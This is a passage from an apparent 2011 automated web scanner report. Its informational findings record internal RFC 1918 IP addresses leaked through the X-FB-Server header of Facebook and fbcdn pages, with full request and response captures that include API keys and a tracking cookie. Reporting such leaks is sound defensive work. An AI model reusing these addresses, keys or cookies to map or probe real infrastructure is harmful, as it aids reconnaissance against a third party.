Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.64.244.56

Request

GET /safe_image.php?d=AQCYSdUTMZOC4P9T&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fstatic%2Fdesign%2Flogo-careerbuilder.gif HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
X-FB-Server: 10.64.244.56
X-Cnection: close
Content-Length: 2898
Cache-Control: public, max-age=86400
Expires: Mon, 05 Sep 2011 01:13:06 GMT
Date: Sun, 04 Sep 2011 01:13:06 GMT
Connection: close

GIF89a.........[.d..................\vv..^......u..M...;;.dc..|'................k
........v...GG......-..j....r.........kLL..j......c))}-,.....[....^].......$${.........~~...o..h.a..c...G....h...o....
...[SNIP]...

25.5. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.63.32.42

Request

GET /safe_image.php?d=AQCuPNOI7DepDg34&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F09%2F02%2F21%2F33%2FLrTcg.Em.138.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.63.32.42
X-Cnection: close
Content-Length: 20934
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Mon, 05 Sep 2011 00:44:50 GMT
Date: Sun, 04 Sep 2011 00:44:50 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

25.6. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.54.60.36

Request

GET /safe_image.php?d=AQDjvwza57X_RJ05&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F09%2F03%2F16%2F17%2FWomle.Em.138.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.60.36
X-Cnection: close
Content-Length: 19351
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Mon, 05 Sep 2011 00:44:50 GMT
Date: Sun, 04 Sep 2011 00:44:50 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

25.7. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.54.173.32

Request

GET /safe_image.php?d=AQBM9j0Iju-FiD9f&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F09%2F03%2F07%2F56%2FFP6Es.Em.138.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.173.32
X-Cnection: close
Content-Length: 23870
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Mon, 05 Sep 2011 00:44:50 GMT
Date: Sun, 04 Sep 2011 00:44:50 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

25.8. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.62.112.60

Request

GET /safe_image.php?d=AQDz2TYFnTBj9gyz&url=http%3A%2F%2Fwww.charlotteobserver.com%2Fstatic%2Fmagazines%2Fshared%2Fimages%2Ffacebook.png HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
X-FB-Server: 10.62.112.60
X-Cnection: close
Content-Length: 2171
Cache-Control: public, max-age=325
Expires: Sun, 04 Sep 2011 00:50:15 GMT
Date: Sun, 04 Sep 2011 00:44:50 GMT
Connection: close

.PNG
.
...IHDR...0...0.....W......BIDATh...M.d.....W.]]._...8:...... D.    .....".H..A\....e..M6..    &.....\.U..*FL2.8~....mwMTW.{.9Y........T...T........s.......<.L..........@.R.R-b.kt.b}.M........3.
...[SNIP]...

25.9. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.138.16.181

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=5597051e9d2034b294865dbb43c47ee0&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df281409b84%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=225
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.181
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=68077
Expires: Sun, 04 Sep 2011 20:07:17 GMT
Date: Sun, 04 Sep 2011 01:12:40 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

25.10. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.30.147.194

Request

GET /connect/xd_proxy.php HTTP/1.1
Host: static.ak.fbcdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.194
X-Cnection: close
Cache-Control: public, max-age=67535
Expires: Sun, 04 Sep 2011 20:09:51 GMT
Date: Sun, 04 Sep 2011 01:24:16 GMT
Content-Length: 2481
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

25.11. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/6buK9-Tz27V.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yQ/r/6buK9-Tz27V.js

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.30.148.191

Request

GET /rsrc.php/v1/yQ/r/6buK9-Tz27V.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 01 Sep 2011 16:22:02 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 175246
Vary: Accept-Encoding
Cache-Control: public, max-age=31334388
Expires: Fri, 31 Aug 2012 16:44:38 GMT
Date: Sun, 04 Sep 2011 00:44:50 GMT
Connection: close

/*1314895489,169776319*/

if (window.CavalryLogger) { CavalryLogger.start_js(["ghcdO"]); }

function hasArrayNature(a){return (!!a&&(typeof a=='object'||typeof a=='function')&&('length' in a)&&!('setI
...[SNIP]...

25.12. http://www.facebook.com/campaign/landing.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.64.194.30

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Tue, 04-Oct-2011 01:26:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.194.30
Connection: close
Date: Sun, 04 Sep 2011 01:26:01 GMT
Content-Length: 0


25.13. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.64.196.55

Request

GET /extern/login_status.php?api_key=150777544942552&app_id=150777544942552&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc9d46b2c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13815c2e4%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df308fdb45c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7783dc98%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b9cd374%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.196.55
X-Cnection: close
Date: Sun, 04 Sep 2011 00:44:11 GMT
Content-Length: 259

<script type="text/javascript">
parent.postMessage("cb=f7783dc98&origin=http\u00253A\u00252F\u00252Fwww.charlotteobserver.com\u00252Ff3bf22f854&relation=parent&transport=postmessage&frame=fe739c6", "h
...[SNIP]...

25.14. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.64.214.45

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df337164584%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17832e2e4%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df351183554%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df356e68488%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df351183554&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc27dfe64%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df351183554&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3671fd398%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df351183554&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.214.45
X-Cnection: close
Date: Sun, 04 Sep 2011 00:44:20 GMT
Content-Length: 22

Invalid Application ID

25.15. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.64.225.42

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.225.42
Connection: close
Date: Sun, 04 Sep 2011 01:26:02 GMT
Content-Length: 22

Invalid Application ID

25.16. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.62.154.42

Request

GET /extern/login_status.php?api_key=169549326390879&app_id=169549326390879&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df72b3c5cc%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff1e65ca694%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e9a0f894%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff1e65ca694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7b422f7%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39f9c37e%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff1e65ca694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7b422f7&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7c80e7dc%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff1e65ca694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7b422f7&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11bc5edf%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff1e65ca694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7b422f7&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/assets/commentsChild?canonical_article_id=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&articleId=USTRE78222D20110903&headline=Notre+Dame+football+stadium+cleared+due+to+lightning&channel=domesticNews&edition=BETAUS&view=base
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.154.42
X-Cnection: close
Date: Sun, 04 Sep 2011 00:52:51 GMT
Content-Length: 240

<script type="text/javascript">
parent.postMessage("cb=f7c80e7dc&origin=http\u00253A\u00252F\u00252Fwww.reuters.com\u00252Ff1e65ca694&relation=parent&transport=postmessage&frame=f7b422f7", "http:\/\/w
...[SNIP]...

25.17. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.64.187.56

Request

GET /extern/login_status.php?api_key=5597051e9d2034b294865dbb43c47ee0&app_id=5597051e9d2034b294865dbb43c47ee0&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df82933318%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25835a4b8%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc5dcd168%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1815fe6b8%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc5dcd168&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23e5bae18%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc5dcd168&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1eb7ab58c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc5dcd168&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.187.56
X-Cnection: close
Date: Sun, 04 Sep 2011 00:44:29 GMT
Content-Length: 262

<script type="text/javascript">
parent.postMessage("cb=f23e5bae18&origin=http\u00253A\u00252F\u00252Fwww.charlotteobserver.com\u00252Ff3bf22f854&relation=parent&transport=postmessage&frame=fc5dcd168",
...[SNIP]...

25.18. http://www.facebook.com/home.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.64.188.39

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.188.39
Connection: close
Date: Sun, 04 Sep 2011 01:26:00 GMT
Content-Length: 0


25.19. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.64.193.39

Request

GET /plugins/like.php?href=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&layout=button_count&show_faces=false&width=100&action=like&font=arial&action=recommend&width=125 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.193.39
X-Cnection: close
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 23550

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

25.20. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.64.194.36

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.194.36
Connection: close
Date: Sun, 04 Sep 2011 01:25:56 GMT
Content-Length: 26542

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

25.21. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

